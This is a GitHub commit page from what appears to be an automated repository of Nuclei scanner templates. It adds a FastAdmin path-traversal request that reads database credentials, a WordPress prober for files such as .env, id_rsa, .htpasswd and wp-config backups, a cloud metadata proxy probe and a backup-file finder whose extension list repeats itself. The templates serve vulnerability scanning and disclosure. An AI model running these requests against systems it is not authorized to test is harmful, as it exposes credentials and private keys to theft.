Skip to content

Commit

Permalink
20241104
Browse files Browse the repository at this point in the history
  • Loading branch information
@actions-user
actions-user committed Nov 4, 2024
1 parent 290efb5 commit 2d685ce
Show file tree
Hide file tree
Showing 8 changed files with 414 additions and 7 deletions.
2 changes: 1 addition & 1 deletion date.txt
View file
Original file line number Diff line number Diff line change
@@ -1 +1 @@
20241103
20241104
5 changes: 5 additions & 0 deletions poc.txt
View file
Original file line number Diff line number Diff line change
Expand Up @@ -6860,6 +6860,7 @@
./poc/backup/snapshot-backup-518ee5abfc5c619140ace18f02fca8ee.yaml
./poc/backup/snapshot-backup.yaml
./poc/backup/urbackup-panel.yaml
./poc/backup/vabro-backup-file-finder.yaml
./poc/backup/veeam-backup-azure-panel.yaml
./poc/backup/veeam-backup-gcp.yaml
./poc/backup/veritas-netbackup.yaml
Expand Down Expand Up @@ -44564,6 +44565,7 @@
./poc/cve/CVE-2024-7895.yaml
./poc/cve/CVE-2024-7918-a7e65e7119ee7b26b163171cf42cfe15.yaml
./poc/cve/CVE-2024-7918.yaml
./poc/cve/CVE-2024-7928.yaml
./poc/cve/CVE-2024-7950-4a4c660d480c32376f512832d16b17e2.yaml
./poc/cve/CVE-2024-7950.yaml
./poc/cve/CVE-2024-7955-5e9fd490f09c7370ea858a067ee264fd.yaml
Expand Down Expand Up @@ -57873,6 +57875,7 @@
./poc/exposed/webpack-sourcemap-disclosure.yaml
./poc/exposed/wget-hsts-list-exposure.yaml
./poc/exposed/wordpress-config-disclosure.yaml
./poc/exposed/wordpress-exposure.yaml
./poc/exposed/wordpress-path-disclosure.yaml
./poc/exposed/wordpress-sensitive-config.yaml
./poc/exposed/wordpress-wp-config-exposure.yml
Expand Down Expand Up @@ -112312,6 +112315,7 @@
./poc/remote_code_execution/Typecho-Rce.yaml
./poc/remote_code_execution/VMware-CVE-2022-22954-RCE.yml
./poc/remote_code_execution/VOIPrce.yaml
./poc/remote_code_execution/Wifisky-7-RCE.yaml
./poc/remote_code_execution/Wordpress-Social_Warfare_Plugins-RCE.yaml
./poc/remote_code_execution/Wordpress-force_download_Plugins-FileDownload.yaml
./poc/remote_code_execution/YealinkPreauthrce.yaml
Expand Down Expand Up @@ -131376,6 +131380,7 @@
./poc/wordpress/wordpress-exit-box-lite-b885aa8757fedd66d898c12224efaf9e.yaml
./poc/wordpress/wordpress-exit-box-lite-e4f715486bc2f2be2ab66f9091e37d49.yaml
./poc/wordpress/wordpress-exit-box-lite.yaml
./poc/wordpress/wordpress-exposure.yaml
./poc/wordpress/wordpress-ext-adaptive-images-lfi.yaml
./poc/wordpress/wordpress-ext-adaptive-images-lfi.yml
./poc/wordpress/wordpress-ext-mailpress-rce.yaml
Expand Down
140 changes: 140 additions & 0 deletions poc/backup/vabro-backup-file-finder.yaml
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,140 @@
id: backup-files
info:
name: Backup Files Finder (information disclosure)
author: Vabro
severity: High
description: |
This template checks for common backup file extensions that may have been left exposed on a target.
requests:
- name: backup-files
path:
- "/backup"
- "/backups"
- "/root"
- "/www"
- "/public_html"
- "/ht_docs"
- "/files"
- "/images"
- "/assets"
- "/media"
- "/documents"
- "/resources"
- "/wp-content/uploads"
method: GET
matchers-condition: or
matchers:
- type: word
words:
- ".bak"
- ".old"
- ".zip"
- ".tar"
- ".tar.gz"
- ".tar.bz2"
- ".tar.xz"
- ".7z"
- ".rar"
- ".gz"
- ".bz2"
- ".xz"
- ".sql"
- ".db"
- ".bak"
- ".swp"
- ".swp"
- ".save"
- ".save"
- ".sav"
- ".sav"
- ".copy"
- ".copy"
- ".backup"
- ".backup"
- ".orig"
- ".orig"
- ".old"
- ".old"
- ".tmp"
- ".tmp"
- ".temp"
- ".temp"
- ".test"
- ".test"
- ".demo"
- ".demo"
- ".dev"
- ".dev"
- ".sample"
- ".sample"
- ".example"
- ".example"
- ".backup"
- ".backup"
- ".config"
- ".config"
- ".conf"
- ".conf"
- ".log"
- ".log"
- ".txt"
- ".txt"
- ".doc"
- ".doc"
- ".docx"
- ".xls"
- ".xlsx"
- ".ppt"
- ".pptx"
- ".pdf"
- ".csv"
- ".bak"
- ".bak"
- ".swp"
- ".swp"
- ".save"
- ".save"
- ".sav"
- ".sav"
- ".copy"
- ".copy"
- ".backup"
- ".backup"
- ".orig"
- ".orig"
- ".old"
- ".old"
- ".tmp"
- ".tmp"
- ".temp"
- ".temp"
- ".test"
- ".test"
- ".demo"
- ".demo"
- ".dev"
- ".dev"
- ".sample"
- ".sample"
- ".example"
- ".example"
- ".backup"
- ".backup"
- ".config"
- ".config"
- ".conf"
- ".conf"
- ".log"
- ".log"
- ".txt"
- ".txt"
- ".doc"
- ".doc"
- ".docx"
- ".xls"
- ".xlsx"
- ".ppt"
- ".pptx"
- ".pdf"
- ".csv"
51 changes: 51 additions & 0 deletions poc/cve/CVE-2024-7928.yaml
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,51 @@
id: CVE-2024-7928

info:
name: FastAdmin < V1.3.4.20220530 - Path Traversal
author: s4e-io
severity: medium
description: |
A vulnerability, which was classified as problematic, has been found in FastAdmin up to 1.3.3.20220121. Affected by this issue is some unknown functionality of the file /index/ajax/lang. The manipulation of the argument lang leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.3.4.20220530 is able to address this issue. It is recommended to upgrade the affected component.
reference:
- https://wiki.shikangsi.com/post/share/da0292b8-0f92-4e6e-bdb7-73f47b901acd
- https://github.com/bigb0x/CVE-2024-7928
- https://nvd.nist.gov/vuln/detail/CVE-2024-7928
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
cvss-score: 4.3
cve-id: CVE-2024-7928
cwe-id: CWE-22
cpe: cpe:2.3:a:fastadmin:fastadmin:1.3.3.20220121:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: fastadmin
product: fastadmin
fofa-query: icon_hash="-1036943727"
tags: cve,cve2024,fastadmin,lfi

http:
- raw:
- |
GET /index/ajax/lang?lang=../../application/database HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'jsonpReturn('
- '"password":'
- '"username":'
- '"database":'
condition: and

- type: word
part: content_type
words:
- 'application/javascript'

- type: status
status:
- 200
# digest: 4a0a0047304502206a03af2bd622586d9ea3423ce05fb8c99fe1ec1940335aca969aece8642d4cf9022100e4fa51cfa54ae2d026551a9ff270d3e4c5e52c4645e364558c90b77f36d71458:922c64590222798bb761d5b6d8e72950
84 changes: 84 additions & 0 deletions poc/exposed/wordpress-exposure.yaml
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,84 @@
id: wordpress-exposed-files

info:
name: WordPress Exposed Sensitive Files Detection
author: Redflare-Cyber
severity: high
description: Detects potentially exposed sensitive WordPress files that may contain credentials, tokens, or PIIs, some are general and not Wordpress specific so may overlap with other similar templates.
tags: wordpress, exposure, creds,

requests:
- method: GET
path:
- "{{BaseURL}}{{file}}"

attack: clusterbomb

payloads:
file:
- /wp-config.php{{suffix}}
- /backup{{suffix}}
- /database{{suffix}}
- /dump{{suffix}}
- /wp-config.php{{archive_ext}}
- /backup{{archive_ext}}
- /database{{archive_ext}}
- /dump{{archive_ext}}
- /wp-config-sample.php
- /.env
- /.git/config
- /.svn/entries
- /.hg/requires
- /.bzr/branch-format
- /.DS_Store
- /debug.log
- /error_log
- /phpinfo.php
- /composer.lock
- /composer.json
- /id_rsa
- /id_rsa.pub
- /.htpasswd
- /.htaccess
- /logs/access.log
- /logs/error.log
- /wp-content/debug.log
- /wp-content/uploads/.htaccess
- /wp-includes/php.ini
- /php.ini
- /info.php
suffix:
- ''
- '~'
- '.bak'
- '.old'
- '.save'
- '.swp'
- '.swo'
- '.sql'
archive_ext:
- '.zip'
- '.tar.gz'
- '.tar.bz2'
- '.tar'
- '.gz'

matchers-condition: and
matchers:
- type: status
status:
- 200
- 206

- type: regex
part: body
regex:
- '(?i)(DB_(NAME|USER|PASSWORD|HOST))'
- '(?i)(AUTH_KEY|SECURE_AUTH_KEY|LOGGED_IN_KEY|NONCE_KEY)'
- '(?i)(FTP_(USER|PASS))'
- '(?i)(<title>phpinfo\(\)</title>)'
- '(?i)(repositoryformatversion|svn|openssl)'
- '(?i)(-----BEGIN [A-Z ]*PRIVATE KEY-----)'
- '(?i)(root:.*:(/bin/bash|/bin/sh))'
- '(?i)(\$cfg\["blowfish_secret"\])'
condition: or
18 changes: 12 additions & 6 deletions poc/other/metadata-alibaba.yaml
View file
Original file line number Diff line number Diff line change
@@ -1,8 +1,9 @@
id: metadata-service-alibaba

# This attack abuses a misconfigured proxy that allows access to the metadata
# IP or a name which resolves to the IP. A standard proxy request is made to
# the proxy using the full metadata URL, which the proxy will fulfull to its
# own metadata sevice.
# the proxy using the full metadata URL, which the proxy will fulfill to its
# own metadata service.
#
# The proxy may also be vulnerable to host/port enumeration on localhost or
# inside the private network.
Expand All @@ -11,29 +12,34 @@ info:
author: sullo
severity: critical
description: The Alibaba host is configured as a proxy which allows access to the metadata service. This could allow significant access to the host/infrastructure.
remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
reference:
- https://www.alibabacloud.com/help/doc-detail/108460.htm
- https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/
- https://www.mcafee.com/blogs/enterprise/cloud-security/how-an-attacker-could-use-instance-metadata-to-breach-your-app-in-aws/
tags: exposure,config,alibaba,proxy,misconfig,metadata
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
cvss-score: 9.3
cwe-id: CWE-441
requests:
metadata:
max-request: 2
tags: exposure,config,alibaba,proxy,misconfig,metadata

http:
- raw:
- |+
GET http://{{hostval}}/dynamic/instance-identity/document HTTP/1.1
Host: {{hostval}}
payloads:
hostval:
- alibaba.interact.sh
- alibaba.oast.pro
- 100.100.100.200
unsafe: true
matchers:
- type: word
part: body
words:
- "zone-id"

# digest: 490a004630440220495fde6b8e524846446e53dead7f589f22c254d0ca7b6e09e07210469773749f0220264d2180b4589c8663f68bab544d951ad739fae7f3b6dccaaacee29718cb4778:922c64590222798bb761d5b6d8e72950
Loading

0 comments on commit 2d685ce

Please sign in to comment.